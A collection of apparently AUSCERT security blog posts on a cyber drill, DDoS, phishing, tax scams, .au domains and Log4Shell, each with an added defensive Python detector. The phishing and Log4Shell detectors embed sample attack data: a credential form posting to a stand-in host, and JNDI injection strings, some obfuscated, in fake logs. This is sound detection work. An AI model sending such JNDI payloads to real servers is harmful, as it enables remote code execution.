
APCERT CYBER DRILL 2022

7 Sep 2022

The Asia Pacific Computer Emergency Response Team (APCERT) recently conducted its annual drill, a collaborative undertaking that maintains and improves awareness and skills within the cyber security community. The theme for 2022 was “Data Breach through Security Malpractice”, which focused on realistic, real world cyber security risks and the incidents that could potentially result from them. AUSCERT Analyst Narayan Neupane said, “This year’s drill was about tracing a ransomware activity and tracing the uploaded file’s location via provided evidence. The drill focused on packet capture, email analysis, forensic investigation, and incident response.” He continued, “Whilst some activities performed in the drill are carried out more than others in our daily work, it’s important and worthwhile to be tested in unexpected ways – it reflects what happens in the real world!” The experiences and tasks conducted by each participating team allow for knowledge sharing, as no single CERT typically experiences the same issues or provides like-for-like services. The APCERT drill aims to maintain and progress internet security and safety, with the exercise providing participants with the chance to improve communication protocols, technical responses, and the overall quality of incident responses. “This year’s drill was tough but also fun, and there was a feeling of satisfaction once we were able to finish the drill successfully”, Narayan concluded. This year, 25 CSIRTs from 21 economies took part in the drill and, although undertaken in a few hours, the lessons learned from the experience can provide benefits long after. As each drill typically requires six to eight months of planning and preparation, the 2023 APCERT Cyber Drill will soon be underway – the ongoing need for education and skill enhancement reflects the rapid development of the digital world we reside in and the threats we all face.


What is DDoS & How Does it Work?

9 Aug 2022

What is distributed denial of service (DDoS) & How Does it Work?

The AUSCERT team provides proactive and reactive incident response assistance, actively seeking information from various sources to help find data relevant to a client. We take immediate action and follow well-defined protocols in order to obtain a resolution and satisfactory outcome. This article is aimed at those who need a high level explanation of what a DDoS attack is.

DDoS Attacks In 2022

Already in 2022 the IT industry has experienced a large increase in distributed denial of service (DDoS) attacks. Not that long ago, most DDoS attacks were seen as minor nuisances perpetrated by harmless novices who did it for fun; back then, DDoS attacks were relatively easy to mitigate. DDoS attacks are becoming an extremely sophisticated activity and, in many cases, big business. According to TechRepublic, in the first quarter of 2022, Kaspersky DDoS Intelligence systems detected 91,052 DDoS attacks. 44.34% of attacks were directed at targets located in the USA, which comprised 45.02% of all targets.

Exactly What Is a DDoS Attack?

Despite DDoS attacks becoming ever more common, they can be quite sophisticated and difficult to combat. But what exactly is a DDoS attack and what does DDoS stand for? DDoS is the acronym for Distributed Denial of Service. A DDoS attack occurs when a threat actor uses resources from multiple, remote locations to attack an organisation’s online operations. The goal is to consume resources so that legitimate access to services is not possible; for example, a website or online service will appear to be ‘down’ for people attempting to use it. DDoS attacks usually focus on generating a huge amount of network traffic that overwhelms the operation of network equipment and services such as routers, domain name services or web caching.

How Long Can DDoS Attacks Last For?

The short answer: there is no set duration. DDoS attacks vary extensively in both duration and sophistication:

Long-Term Attack: An attack waged over a period of hours or days is referred to as a long-term attack. For example, the largest recorded DDoS attack was against Amazon Web Services (AWS); this caused disruption for three days before finally being mitigated.

Burst Attack: Also known as pulse-wave attacks, as the name implies they are waged over a very short period of time, lasting from a few seconds to a few minutes and occurring in frequent bursts.

Again, time is not really a factor; the quicker burst attacks can be just as damaging as the long-term attacks.

How to Protect Your Organisation Against DDoS Attacks

Some measures that organisations can take to protect themselves against DDoS attacks are:

- Reduce the attack surface of Internet-visible services to only that which is required. For example, inbound ICMP packets are unlikely to be needed and should be blocked.
- Use a Content Delivery Network (CDN).
- Implement server-level DDoS mitigation measures, making use of best practice guides from application and operating system software providers.
- Plan for disruption, including alternative ways of providing services to clients. Short term increases in network or server capacity may be a solution, depending on the costs. Knowing these in advance will inform business continuity planning discussions.
- Implement monitoring systems to detect large increases in outbound network traffic, to avoid becoming part of the problem and the cause of reputational damage.

Phishing Take-down service

AUSCERT’s Phishing Take-down service works to reduce brand damage by requesting the removal of fraudulent websites. The service puts the safety of your brand at the forefront by detecting and acting immediately if your organisation is affected. To find out more about this service click here.
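The last protective measure above, monitoring for large increases in outbound traffic, is the one most easily shown in code. The following is an added example and not part of the original article: it learns a baseline from the first twenty minutes of constructed per-minute outbound byte counters, then labels each anomalous run as a burst or a sustained attack using the duration distinction the article draws. The thresholds and sample values are assumptions.

```python
"""Flag abnormal outbound traffic volumes from per-minute byte counters."""
from statistics import mean, pstdev

# Constructed sample: (minute, outbound bytes) read from an edge router counter.
# Twenty quiet minutes, then a one-minute burst, then a sustained flood.
SAMPLE_COUNTERS = [(m, 4_000_000 + (m % 3) * 150_000) for m in range(20)]
SAMPLE_COUNTERS += [(20, 95_000_000), (21, 4_100_000), (22, 4_050_000)]
SAMPLE_COUNTERS += [(m, 60_000_000 + (m % 2) * 2_000_000) for m in range(23, 35)]


def detect_outbound_anomalies(samples, baseline_minutes=20, z_threshold=6.0,
                              min_sustained=5):
    """Return alerts as (start_minute, end_minute, kind, peak_bytes) tuples.

    The first `baseline_minutes` samples establish normal behaviour. Every later
    sample whose z-score against that baseline exceeds `z_threshold` is anomalous.
    A run of fewer than `min_sustained` consecutive anomalous minutes is reported
    as a "burst"; a longer run as "sustained" (the article's long-term attack).
    """
    if len(samples) <= baseline_minutes:
        raise ValueError("not enough samples to establish a baseline")
    baseline = [byte_count for _, byte_count in samples[:baseline_minutes]]
    mu = mean(baseline)
    sigma = max(pstdev(baseline), 1.0)  # guard against a perfectly flat baseline

    alerts = []
    run = []  # consecutive anomalous (minute, bytes) pairs not yet reported

    def flush():
        if run:
            kind = "burst" if len(run) < min_sustained else "sustained"
            alerts.append((run[0][0], run[-1][0], kind, max(b for _, b in run)))
            run.clear()

    for minute, byte_count in samples[baseline_minutes:]:
        if (byte_count - mu) / sigma > z_threshold:
            run.append((minute, byte_count))
        else:
            flush()
    flush()  # close a run that lasts until the end of the window
    return alerts


if __name__ == "__main__":
    for start, end, kind, peak in detect_outbound_anomalies(SAMPLE_COUNTERS):
        print(f"{kind:9s} minutes {start}-{end}, peak {peak:,} bytes/min")
```

In production the counters would come from flow exports or an SNMP poller, and the baseline should be recomputed per time of day rather than from a fixed window.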


What is Phishing?

9 Aug 2022

What is Phishing?

Phishing is an attack whereby the attacker impersonates a reputable entity or person in email or other forms of communication, such as SMS or instant messaging. Most commonly, attackers will use phishing emails to distribute malicious links or attachments that can perform a variety of malicious functions.

Phishing Attacks

A phishing attack can have devastating results. For individuals, this includes unauthorised purchases, electronic theft of money, or identity theft. Phishing attacks can often be used to gain a foothold into an organisation’s network as part of a larger attack, such as ransomware or Business Email Compromise. This happens when employees are compromised in order to bypass security controls and distribute malware or fraudulent messaging inside the victim organisation. A successful attack on an organisation can have severe implications such as financial losses and extended outages, in addition to a reduction of market share, damaged reputation, and loss of customer trust.

Types Of Phishing Attacks

Email Phishing Scams

In the most common version of email-based phishing, the attacker sends out thousands of fraudulent messages with the intent of gathering personal information or account credentials, or for financial gain. This type of attack is very much a numbers game: even if only 1% of several thousand recipients fall for the scam, the attack can be considered successful. As with legitimate marketing campaigns, fraudsters will also take the time and effort to maximise their success rates by trialling different messaging and tactics and studying their relative success. They will clone emails from a spoofed organisation, using the same phrasing, typefaces, logos and signatures to make the messages appear legitimate. Additionally, attackers will commonly try to push users into action by creating a sense of urgency. For example, an email could threaten account expiration and place the recipient on a deadline. By applying a time-sensitive cue, users are more likely to act sooner rather than later, without much thought. These scams can be hard to spot, typically having a misspelt website address or an extra subdomain; for example, www.commbank.com.au/login could become www.combank.com.au/login. The similarities between the two website addresses give the impression of a legitimate link, making it more difficult to discover that an attack is taking place.

Spear Phishing

This is a more precisely focused attack, as spear phishing targets a specific person or organisation, as opposed to thousands of people as described above. It’s a more specific type of phishing that often incorporates special knowledge about an organisation, such as its staff members’ names and titles, organisational structure and clients. A common spear phishing attack scenario is where the attackers research the names of employees within an organisation’s marketing department in order to gain access to the latest project invoices. Posing as a marketing director, the attacker emails a departmental project manager (PM) using a subject line that reads something like “Updated invoice for Q3 campaigns”. This email will be a clone of the organisation’s standard email template. A link in the email redirects to a password-protected internal document, which is simply a spoofed version of a stolen invoice. The PM is requested to log in to view the document. The attacker steals the login credentials, gaining full access to sensitive areas within the organisation’s network. By providing an attacker with valid login credentials, spear phishing is an effective method for executing the first stage of further attacks, such as ransomware or Business Email Compromise.

How To Prevent Phishing

To protect against phishing attacks, steps should be taken by both employees and enterprises. For employees, simple vigilance is vital. A spoofed message will almost always contain subtle differences that expose its fraudulent purpose. These frequently include spelling errors, such as in website names. Users should also stop and think about why they’re even receiving the email and whether it seems unusual or out of character for the alleged sender.

At an enterprise level, a number of steps can be taken to mitigate both phishing and spear phishing attacks:

- Two-factor authentication (2FA) is the most effective method for countering phishing attacks, as it adds an extra verification layer when logging in to applications. 2FA relies on users having two things: something they know, such as a password and username, and something they have, such as a mobile phone running an authentication app.
- Organisations should enforce a strict password management policy that takes into account how people actually behave. For example, staff should be required to use passwords that are difficult for an attacker to guess but not so complex that they can’t be remembered by people. Passphrases are often a better strategy than complex passwords. Password managers combine convenience and strong passwords, and their use should be encouraged.
- Staff should be educated not to reuse the same password for multiple accounts, as this makes password spraying attacks much easier.
- Empowering employees through engaging and informative cyber security awareness training will help reduce the threat of most cyber security attacks, including phishing.
- Enable SPF and DMARC to make it more difficult for attackers to send email faking an organisation’s identity.

Early Warning SMS

Early warning notifications assist in managing critical security threats to your network. AUSCERT monitors malicious activity online, and the Early Warning Service provides SMS notifications of any immediate and serious threats relevant to your industry. To find out more about this service click here.
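The lookalike address in the example above (www.combank.com.au standing in for www.commbank.com.au) is something a mail gateway can catch mechanically. The following is an added example, not part of the original article: it extracts the URLs from a message and classifies each host against a constructed list of protected brand domains, flagging misspellings (a small edit distance from a protected domain) and brand names pushed into a subdomain of some other domain. The protected domain list and the sample message are assumptions.

```python
"""Flag URLs in a message whose host looks like a protected brand domain."""
import re
from urllib.parse import urlparse

# Constructed list of legitimate domains to protect (the article's example bank
# plus AUSCERT's own); a real deployment would load the organisation's domains.
PROTECTED_DOMAINS = ["commbank.com.au", "auscert.org.au"]

# Constructed sample message with one lookalike link and one legitimate link.
SAMPLE_MESSAGE = (
    "Your account will expire today. Log in at https://www.combank.com.au/login "
    "to keep access, or visit https://www.commbank.com.au/help for assistance."
)

URL_RE = re.compile(r"https?://[^\s<>\"')]+", re.IGNORECASE)


def registrable_domain(host):
    """Approximate the registrable domain: the last three labels for .au
    second-level domains (com.au, org.au, gov.au, ...), otherwise the last two.
    Good enough here; a production tool would use the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and labels[-1] == "au" and len(labels[-2]) <= 3:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Levenshtein distance via the standard dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host, protected=PROTECTED_DOMAINS, max_distance=2):
    """Return "legitimate", "lookalike", "embedded-brand" or "unrelated"."""
    host = host.lower()
    reg = registrable_domain(host)
    for good in protected:
        if reg == good:
            return "legitimate"       # the brand's own domain or a subdomain of it
        if edit_distance(reg, good) <= max_distance:
            return "lookalike"        # misspelt address, e.g. combank.com.au
        brand = good.split(".")[0]
        # The brand name appears as a subdomain or label of an unrelated domain.
        # Short brand names would need a stricter match to avoid false positives.
        if brand in host:
            return "embedded-brand"
    return "unrelated"


def suspicious_urls(message_text):
    """Return (url, verdict) pairs for every URL whose host is a lookalike or
    embedded-brand host; legitimate and unrelated hosts are not reported."""
    findings = []
    for url in URL_RE.findall(message_text):
        host = urlparse(url).hostname or ""
        verdict = classify_host(host)
        if verdict in ("lookalike", "embedded-brand"):
            findings.append((url, verdict))
    return findings


if __name__ == "__main__":
    for url, verdict in suspicious_urls(SAMPLE_MESSAGE):
        print(f"{verdict}: {url}")
```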


Staying aware this tax time

5 Jul 2022

As one financial year ends and another begins, Australians start preparing their tax returns and, with it, an increase in the frequency and scope of tax-related phishing is expected. We are going to look at various methods a scammer or attacker might use to obtain your personal information such as username, password, credit card details, contact details or any other information that identifies you as you. This personal information is then used fraudulently or to conduct further malicious activities, depending on the data obtained.

Email phishing

Email phishing is one of the most common methods used to obtain your personal information. The sender imitates the Australian Tax Office (ATO) or MyGov and sends a phishing email that looks like a legitimate email. The spoofed sender address may be difficult to detect when the recipient is using a phone as, typically, the phone does not show the actual email address in full, which would reveal who it was sent from.

a. Email with a phishing URL

Usually, such emails contain a phishing link that, when clicked, redirects the user to a website asking for personal information. Emails that request the recipient to enter their details, such as bank account information, could lead to fraud.

(Figure: example of a malicious email with a phishing URL)

b. Email with a local HTML attachment

Some emails will not contain any phishing URLs within the body of the email. Instead, the email will have an HTML file as an attachment. When a user opens the HTML attachment, it will present a phishing form requesting the user to enter a username and password. The HTML file contains code that sends the credentials to the attacker (if entered). Such techniques are used to avoid email security software.

(Figure: example of a malicious email with an HTML attachment)
(Figure: example of the HTML phishing form delivered by such an email)

Smishing (SMS Phishing)

As consumers become more aware of potential threats and scams, attackers develop new methods to target and trick recipients. One such method is smishing. This method is quite simple, as the fake texts are disguised to come from a known and trusted source such as a bank or the ATO. In this instance, a text message with a URL is sent to a phone number pretending to be from MyGov. When clicked, the user is redirected to a MyGov phishing page where they are required to enter personal information. Additionally, it could then redirect the user to a secondary phishing page made to look like a bank.

(Figure: example of a malicious phishing link in an SMS/text message (1))
(Figure: example of a malicious phishing link in an SMS/text message (2))
(Figure: example of a phishing page (MyGov))
(Figure: example of a phishing page redirecting to a secondary phishing page (MyGov to a bank))

It is important to know that the ATO or MyGov would not send any email or text message directly asking for personal information. Should you receive a suspicious email or SMS, please report it to ReportEmailFraud@ato.gov.au or contact the ATO. If something looks suspicious, be it the spelling, the website address or the request within the message, do not click the link or proceed!

The ATO is a member of AUSCERT and we help the ATO in deactivating such phishing websites. AUSCERT members have access to the Malicious URL Feed, which is automatically populated with malware and phishing links as AUSCERT’s Analyst Team processes them and is updated every 15 minutes. Additional indicators (over and above the malicious URLs), such as email content and phish page screen captures, can be found in AUSCERT’s Member Security Incident Notifications (MISP). Further information on the mentioned services can be found at the links below:

- AUSCERT Malicious URL Feed
- AUSCERT MISP
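The HTML attachment technique described above leaves a recognisable trace: a form with a password field whose action posts to a host that is not the impersonated organisation. The following is an added example, not part of the original article, that parses an attachment and reports such forms. The sample attachment, the placeholder host collector.invalid and the trusted host list are constructed, not real indicators.

```python
"""Inspect an HTML email attachment for a credential-harvesting form."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment in the style described in the article: a local
# HTML file whose form posts the entered credentials to an attacker-controlled
# host. "collector.invalid" is a placeholder under the reserved .invalid TLD.
SAMPLE_ATTACHMENT = """<html><body>
<h2>myGov - Sign in</h2>
<form method="post" action="https://collector.invalid/submit.php">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form></body></html>"""


class FormInspector(HTMLParser):
    """Collect every <form> with its action target and the input types it holds."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "inputs": [type, ...]}
        self._current = None   # form currently being read, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append((a.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def assess_html_attachment(html_text, trusted_hosts=("my.gov.au", "ato.gov.au")):
    """Return a list of reasons the attachment looks like a phishing form.

    An empty list means no credential form was found. A form with a password
    field is flagged when its action is an absolute URL whose host is outside
    `trusted_hosts` (a constructed list here), or when it has no absolute action
    at all, which in a standalone file usually means script-driven submission.
    """
    parser = FormInspector()
    parser.feed(html_text)
    reasons = []
    for form in parser.forms:
        if "password" not in form["inputs"]:
            continue  # only credential forms are of interest here
        host = urlparse(form["action"]).hostname or ""
        trusted = any(host == h or host.endswith("." + h) for h in trusted_hosts)
        if host and not trusted:
            reasons.append(f"password form posts to external host {host}")
        elif not host:
            reasons.append("password form with no absolute action (likely submitted by script)")
    return reasons


if __name__ == "__main__":
    for reason in assess_html_attachment(SAMPLE_ATTACHMENT):
        print("suspicious:", reason)
```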


BDO and AUSCERT Cyber Security Survey Report 2021

13 Apr 2022

BDO and AUSCERT say the federal government’s technology investment boost is a good first step to heighten the resilience of Australian businesses. However, there is a need for business guidance to avoid another ‘pink batts’ fiasco. The emergence of questionable ‘pop-up’ providers is a reality, say the industry experts.

On 29 March 2022, as part of the 2022–23 Budget, the Australian Government announced it will support small business via the Small Business Technology Investment Boost and Small Business Skills and Training Boost. Small businesses with annual turnover of less than $50 million will be able to deduct 120% of eligible training and assets, such as cyber security systems or subscriptions to cloud-based services, in their 2022–23 tax return.

AUSCERT and BDO are calling for guidance to be provided for SMEs looking to take advantage of the government incentives, to mitigate the chance of inadequate governance.

“AUSCERT recognises the significance of the latest federal government announcement and hopes the promise will be matched equally by delivery,” said AUSCERT Director David Stockdale. “While it is easy for a government in the run-up to an election to make promises, the true benefit is in recognising the needs of SMEs and then delivering the training that will lift the cyber security posture of these organisations. This is a huge task, and with additional pressures on the already stretched Australian Cyber Security Centre to be actively involved with additional critical infrastructure requirements amongst other things, it will fall to the private sector to fill the gap.”

“Helping SMEs to understand the threats, assess their own risk landscape and implement proportional controls is critical, and is no easy task. Risk management and cybercrime awareness aren’t the core business of most SMEs, and history has shown that even large corporates can fall victim to wide scale breaches if inadequate governance is in place over contractors such as managed Cyber Security Operations Centres,” noted David. “Training, and regulation of the training, needs to address these knowledge gaps – let’s hope we do not see providers peddling a “silver bullet” course and we find ourselves looking back and seeing another ‘pink batts’ fiasco.”

The latest BDO and AUSCERT Cyber Security Survey found incidents requiring data recovery efforts also rose by 160% from 2020, suggesting that cyber attacks are becoming more destructive and laser focused.

BDO Partner and National Cyber Security Leader Leon Fouche said, “The technology investment boost is a great first step to heighten the resilience of Australian businesses. However, the government announcements to help drive training create a ripe environment for ineffective training and providers to pop up.”

The BDO and AUSCERT survey found that 2021 saw a staggering 175% increase in data breaches caused by accidental emails, such as ‘CC’ing’ instead of ‘BCC’ing’, indicating that staff security awareness training may not be as robust as needed in the wake of remote working arrangements.

“With the steady increase in working remotely driven by the pandemic there is growing awareness of the need for training,” said Leon. “Indeed, our report showed that 1 in 4 organisations have invested in some form of cyber awareness training. Yet most organisations don’t have a chief security officer, or specialist security contractor on speed dial to keep up with the rapidly changing landscape of cyber threats, so the government will need to be able to provide SMEs with a starting point and ongoing support to really help these incentives be impactful.”

The BDO and AUSCERT Cyber Security Survey found that 60% of organisations use some form of cyber threat intelligence, meaning those who are not continually learning about new cyber threats are lagging behind their peers. The survey identified several steps business can take to significantly lessen cyber incidents, including onboarding Security Operations Centres, implementing Cyber Awareness Training, undertaking Supply Chain Risk Assessments, and creating Cyber Incident Response Plans.

“No doubt the incentives announced by the government will drive SMEs signing on to training and purchasing assets,” commented Leon. “Whether this means a business’s first training course for their staff or upskilling of those employees who already have some awareness training, what is key is guidance on how business can best invest so their efforts are most effective, including avoiding investment in poor training or assets.”

BDO forensic expert Stan Gallo said, “Rather than just handing money to the SME owners and leaving them to it, an alternative approach might be to first guide them to where they can discuss the possibilities and get advice on technology investment that can take their business to the next level. There is a lot more to digital evolution than a flashy website or a cloud subscription and throwing money at SME business.”

Stan noted that the Technology Investment Boost will be a great opportunity to enhance cybersecurity, but hardly revolutionary. “The Technology Investment Boost is terrific for innovative tech driven start-ups and entrepreneurial business, but mature SMEs looking to grow still need to understand the basics of how technology can enhance their business, in addition to standard backend operations. Many people that have laboured over the years and built up a successful business, particularly in traditionally non technology driven areas, still need assistance to understand technology investment and how it can add value to their business operations.”

“There is an increased risk the money will be spent on standard IT support and lacklustre training provided by questionable ‘pop-up’ providers,” cautioned Stan.

“The types of threats we are seeing continue to evolve in line with current events and technologies, but at their core, there remain many similarities. Phishing, ransomware encryption, business email compromise and data theft are still ever present,” noted Stan. “However, there has been some insidious countermovement. For example, on the back of a growing trend of heightened preparedness and recoverability, thereby denying ransom payments, the ‘standard’ ransomware attack is now regularly linked to an initial theft of data to provide two bites at the cherry. If the victim is not going to pay the ransom – then maybe, they will pay to get their confidential data back. As usual there are no guarantees either way.”

You can view a copy of the BDO and AUSCERT Cyber Security Survey at the following link: Cyber Survey Report 2021


.au Direct Domain names are a new option for Australian internet users

18 Mar 2022

From 24 March 2022, the Australian Domain Administration (auDA) will be introducing a new option for Australian internet users with the availability of .au direct domain names. The shorter and simpler domain names (such as pavlova.au, station.au and so on) will be open to individuals and organisations that wish to have an online presence, new or existing, with the proviso that they have a verified connection to Australia.

Whilst offering convenience for businesses and individuals, it also presents an opportunity for cybercriminals to create malicious domains. At AUSCERT, it’s our purpose to understand just what those threats might be, to provide our members with an analysis of the situation. While it is impossible to completely prevent all kinds of domain name abuse, the requirements auDA has in place (such as registrants needing to have an ‘Australian presence’) certainly help mitigate against widespread and easy abuse (as is prevalent in many other jurisdictions).

auDA has extensive resources available should you wish to learn more, including detailed information regarding registering domain names in .au direct, timelines, domain conflict resolution and so on. In addition, you can contact your preferred domain retailer. However, in brief, some points of note are:

- auDA continues with its strict rules against .au domains being used in any malicious or illegal activities and will take action against recognised offenders.
- auDA will provide priority registration to those organisations with existing registered domains to the same name in ‘.au’. For example, here at AUSCERT, we have ‘auscert.org.au’, which gives us priority to register and use ‘auscert.au’. This priority period runs for six months from the launch date (24 March 2022), after which the ‘.au’ domain becomes available to anyone. Essentially, this means you have until 20 September 2022 to register the new ‘.au’ version of any existing domain names you wish to keep.
- An “Australian presence” will be required to register a .au direct domain and essentially requires one of:
  - An ABN
  - A Trademark number
  - An Australian identification document (passport, driver’s licence, etc.)

So, what does this mean for you?

- Be aware that the .au direct domains are being launched on 24 March 2022.
- Consider which of your existing domains you may wish to register in .au direct. We encourage all members wishing to undertake this process to do so within six months, to avoid any potential issues arising later.
- Determine whether there may be any potential conflicts with other domain name registrants and understand the auDA process for resolving the conflicts. Check the auDA website for complete details.
- Contact your preferred domain retailer to register your new domains.
- Consider which new (rather than existing) domain names you may wish to register.
- Be aware that the opening up of a new domain space always provides potential for a resurgence of domain abuse (such as domain squatting, phishing, etc.) and take pre-emptive measures, such as registering your domains in the new domain space.

Please contact the team at AUSCERT if you have any security-related questions relating to the introduction of .au direct domains that you believe we can assist with. All other questions concerning, for example, domain registration, conflict resolution and so on are best dealt with by reviewing auDA’s or your retailer’s .au direct resources.


Log4Shell-Logjam Overview

15 Dec 2021

Log4Shell-Logjam Overview

(Picture credit: Lunasec[1])

TLDR; Patch, check your patches work, check logs for attempts and possible compromise.

Log4Shell is a tag used by Lunasec[1] to describe the vulnerability in Apache Log4j2 that was disclosed abruptly by a tweet[2] and a GitHub repo. This sudden announcement forced security professionals to work in a short time frame to protect systems before other interested parties could discover, compromise and potentially take over those systems. Among the security groups alerted through the above were computer emergency response teams, which recognised the impact and came out with early advisories[3][4][5] that are either being updated or are being referenced by newer advisories[6].

The attack surface was of prime concern, and security professionals were exchanging ways to detect it through various third party search results. One of the lists of the attack surface that was published early showed that Log4Shell or LogJam would affect a large number of systems[7][8]. Ways to detect affected servers were refined into a script[9][10], and other entities also released tools to detect vulnerable servers through first party scanning[11][12][13]. First party scanning is not of concern, but unauthorised second party scanning is. This activity was eventually detected[14], and exploit payloads soon followed[15].

The manner in which the vulnerability was disclosed gave a short time frame for the naming and grading. This was evident as the PSIRT initially only had release candidates[16][17], which were later checked, with reports that both had to be used[18]. The vulnerability was later allocated CVE-2021-44228[19] and carried the PSIRT’s analysis[20][21] of a CVSSv3 base score of a perfect 10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

Before a full patch was available from the PSIRT[22], mitigations were collated and a vaccine made available[23][24] to provide an easy way to mitigate[24] the unauthorised second party scanning attempts to drop a malicious payload. No doubt there will be more numerous and extensive reports[26][27][28][29][30][31][32][33][34][35] made available by noted security organisations, as well as a plethora of resources listed to help[36][37], but the advice right now is as in the TLDR: check your version[38][39], patch, check your patch, check your logs for attempts and possible compromise[40], and take remediation steps if any IoCs show up[41][42][43][44][45][46]. In a time span no longer than a week, CVE-2021-44228 has gone from proof of concept drop, to internet wide scans, to carrying crypto-coin miner payloads, to now being found to carry ransomware payloads.[47][48]

Finally, if your weekend was thought to be hectic as a result of this abrupt disclosure, send some positive thoughts to the three volunteers[49][50] who maintain a piece of code that the internet has come to depend on so much. These three volunteers have worked very hard getting us a patch as soon as possible.[51] As well, we would like to thank all the contributors that have made this article possible by submitting to us relevant links and articles.
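Checking logs for attempts, as the TLDR advises, means finding JNDI lookup strings that may arrive URL-encoded or wrapped in Log4j's case-conversion lookups, which is the normalisation the detector scripts cited above[40] perform. The following is an added example, not taken from the article or from any of the referenced tools: it normalises constructed web access-log lines and reports the source address and lookup protocol of each attempt. The log lines and the scanner.invalid host are constructed, not real indicators.

```python
"""Scan web server log lines for Log4Shell (CVE-2021-44228) exploitation attempts."""
import re
from urllib.parse import unquote

# Constructed sample access-log lines: three probes (plain, URL-encoded, and
# wrapped in a ${lower:...} lookup) followed by one ordinary request.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://scanner.invalid/a}"
203.0.113.11 - - [11/Dec/2021:03:15:22 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.invalid%2Fb%7D HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.12 - - [11/Dec/2021:03:16:01 +0000] "GET /?q=${${lower:j}ndi:rmi://scanner.invalid/c} HTTP/1.1" 404 153 "-" "curl/7.79"
198.51.100.5 - - [11/Dec/2021:03:17:45 +0000] "GET /index.html HTTP/1.1" 200 3512 "-" "Mozilla/5.0"
"""

# ${lower:x} and ${upper:x} evaluate to the enclosed text, so a detector must
# collapse them before looking for the lookup keyword. Public detectors handle
# further lookup types; this example keeps to these two.
_WRAPPER_RE = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
# A JNDI lookup names its protocol after the first colon: ${jndi:ldap://...}.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalise(line, rounds=5):
    """URL-decode and collapse case-conversion wrappers, repeating a bounded
    number of times because both may be applied more than once. Returns the
    lower-cased result."""
    for _ in range(rounds):
        unwrapped = _WRAPPER_RE.sub(lambda m: m.group(1), unquote(line))
        if unwrapped == line:
            break
        line = unwrapped
    return line.lower()


def scan_log(text):
    """Return (source_ip, protocol, raw_line) for every line that contains a
    JNDI lookup after normalisation. The protocol (ldap, rmi, dns, ...) tells a
    responder what kind of callback the probe tried to trigger."""
    hits = []
    for raw in text.splitlines():
        match = _JNDI_RE.search(normalise(raw))
        if match:
            source_ip = raw.split(" ", 1)[0]  # first field of a combined-format line
            hits.append((source_ip, match.group(1).lower(), raw))
    return hits


if __name__ == "__main__":
    for ip, proto, line in scan_log(SAMPLE_LOG):
        print(f"{ip} attempted a jndi:{proto} lookup: {line[:80]}...")
```

A hit shows an attempt, not a compromise; the follow-up is to check whether the application was running a vulnerable Log4j version at that time and whether the named host was contacted from the server.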
[1] Lunasec Advisory https://www.lunasec.io/docs/blog/log4j-zero-day/
[2] Tweeted 0-Day https://twitter.com/P0rZ9/status/1468949890571337731
[3] NZCERT https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
[4] AUSCERT ASB https://portal.auscert.org.au/bulletins/ASB-2021.0244.2
[5] SingCERT https://www.csa.gov.sg/en/singcert/Alerts/al-2021-070
[6] AUSCERT ESB https://portal.auscert.org.au/bulletins/ESB-2021.4186
[7] Attack Surface https://github.com/YfryTchsGD/Log4jAttackSurface
[8] Randori Blog https://www.randori.com/blog/cve-2021-44228/
[9] log4j_rce_check https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
[10] Log4j2Scan https://github.com/whwlsfb/Log4j2Scan
[11] Qualys Detection https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell
[12] SocPrime https://socprime.com/blog/cve-2021-44228-detection-notorious-zero-day-in-log4j-java-library/
[13] Imperva https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/
[14] Log4j RCE Attempts https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
[15] Cloudflare Blog https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
[16] PSIRT rc1 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
[17] PSIRT rc2 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
[18] CyberKendra https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
[19] NVD https://nvd.nist.gov/vuln/detail/CVE-2021-44228
[20] The Record https://therecord.media/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up/
[21] PSIRT Advisory https://logging.apache.org/log4j/2.x/security.html
[22] PSIRT Download https://logging.apache.org/log4j/2.x/download.html
[23] Cybereason Blog https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228
[24] Cybereason Vax https://github.com/Cybereason/Logout4Shell
[25] DarkReading https://www.darkreading.com/dr-tech/what-to-do-while-waiting-for-the-log4ju-updates
[26] PaloAlto https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
[27] Cloudflare Blog https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
[28] Cloudflare Blog https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
[29] Sygnia Advisory https://blog.sygnia.co/log4shell-remote-code-execution-advisory
